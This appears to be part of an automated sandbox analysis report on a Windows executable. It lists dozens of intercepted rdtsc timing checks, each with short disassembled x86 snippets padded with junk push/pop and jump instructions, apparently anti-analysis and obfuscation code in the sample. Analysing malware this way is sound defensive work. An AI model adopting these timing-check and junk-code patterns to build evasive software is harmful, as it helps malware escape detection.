Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59F27 second address: D59F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59F2D second address: D59F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59F32 second address: D59F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF1549h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD6E6D second address: CD6E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F4760DF9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F4760DF9846h 0x00000013 jg 00007F4760DF9846h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e jns 00007F4760DF9846h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD6E91 second address: CD6EAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1548h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D58DA6 second address: D58DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D58DAB second address: D58DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4760DF1536h 0x0000000a jc 00007F4760DF1536h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D58F2B second address: D58F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D5920B second address: D59211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59211 second address: D59217 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59217 second address: D5921D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D593CA second address: D593D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59685 second address: D596B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4760DF1543h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF1543h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D596B2 second address: D596BC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4760DF9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59D8A second address: D59D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F4760DF1536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D586D8 second address: D586FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4760DF9859h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1A805 second address: D1A80B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AA18 second address: D1AA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AA29 second address: D1AA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F4760DF1540h 0x00000010 pushad 0x00000011 jp 00007F4760DF1536h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F4760DF1549h 0x00000023 mov eax, dword ptr [eax] 0x00000025 jnl 00007F4760DF1544h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F4760DF1542h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AB7A second address: D1AB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AB7E second address: D1AB84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AB84 second address: D1AB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AB8A second address: D1ABB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c mov cl, 7Eh 0x0000000e nop 0x0000000f pushad 0x00000010 jp 00007F4760DF1538h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F4760DF1536h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1ABB6 second address: D1ABBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AEB6 second address: D1AEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1AEBC second address: D1AEEE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub ecx, 67DB13A9h 0x00000013 push 00000004h 0x00000015 adc cl, 0000007Eh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4760DF9857h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B2C2 second address: D1B2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF153Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B2D1 second address: D1B2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B607 second address: D1B60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B792 second address: D1B7B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B7B1 second address: D1B7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B7B5 second address: D00F9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 jmp 00007F4760DF9851h 0x0000000d call dword ptr [ebp+122D1EF3h] 0x00000013 pushad 0x00000014 jmp 00007F4760DF984Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F4760DF9846h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D61CFA second address: D61D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D61D04 second address: D61D1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a ja 00007F4760DF9846h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D62113 second address: D62129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4760DF153Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D62129 second address: D6212D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6212D second address: D62137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D622C1 second address: D622C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D622C5 second address: D622CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CCE622 second address: CCE626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CCE626 second address: CCE62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D64E65 second address: D64E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF9856h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4760DF984Ch 0x00000010 jmp 00007F4760DF984Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D64E9A second address: D64EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67A24 second address: D67A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67CB9 second address: D67CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4760DF1536h 0x0000000a jmp 00007F4760DF1543h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F4760DF153Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E30 second address: D67E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E38 second address: D67E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4760DF153Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E4A second address: D67E52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E52 second address: D67E5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4760DF153Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E5C second address: D67E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F4760DF9846h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E6D second address: D67E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4760DF153Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D67E84 second address: D67E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6982C second address: D6984F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF1541h 0x00000011 jp 00007F4760DF1536h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6D8B2 second address: D6D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4760DF9846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6D8BC second address: D6D8C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6DA2A second address: D6DA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jo 00007F4760DF9846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6DBAB second address: D6DBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F4760DF153Fh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F4760DF153Eh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6DBD5 second address: D6DBE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jng 00007F4760DF9846h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D6E160 second address: D6E164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D72E30 second address: D72E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B09B second address: D1B121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4760DF1544h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F4760DF1538h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1CB3h], ebx 0x0000002c mov ebx, dword ptr [ebp+124850A0h] 0x00000032 mov edx, dword ptr [ebp+122D3EABh] 0x00000038 sbb ecx, 17FACBDFh 0x0000003e add eax, ebx 0x00000040 pushad 0x00000041 mov eax, dword ptr [ebp+122D1D65h] 0x00000047 mov di, 3B31h 0x0000004b popad 0x0000004c pushad 0x0000004d sbb eax, 016D2CDEh 0x00000053 popad 0x00000054 nop 0x00000055 jmp 00007F4760DF1541h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jnc 00007F4760DF153Ch 0x00000063 jc 00007F4760DF1536h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B121 second address: D1B135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF9850h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1B135 second address: D1B139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D73405 second address: D73416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF984Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7357B second address: D7357F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7357F second address: D73585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D73F06 second address: D73F17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D73F17 second address: D73F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4760DF984Fh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4760DF984Ch 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D73F42 second address: D73F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D76A4B second address: D76A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F4760DF9846h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D76A62 second address: D76A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D76A66 second address: D76A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F4760DF9876h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7E86C second address: D7E883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F4760DF153Ch 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EB02 second address: D7EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F4760DF9859h 0x0000000b jne 00007F4760DF9846h 0x00000011 popad 0x00000012 ja 00007F4760DF9848h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EB30 second address: D7EB4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F4760DF1536h 0x00000009 ja 00007F4760DF1536h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F4760DF1536h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EB4A second address: D7EB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EE31 second address: D7EE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EE3B second address: D7EE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EE47 second address: D7EE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7EE51 second address: D7EE6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4760DF9854h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7F6C2 second address: D7F6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7F6C8 second address: D7F6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7F6CC second address: D7F6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1543h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7F6E9 second address: D7F6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D7F6EF second address: D7F6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D80257 second address: D8025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D8025B second address: D8026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4760DF1536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F4760DF1536h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D8026F second address: D80273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D8514C second address: D85188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4760DF154Ah 0x0000000a jmp 00007F4760DF1544h 0x0000000f jmp 00007F4760DF1547h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D8891E second address: D8894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF984Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F4760DF9850h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88A96 second address: D88AA0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
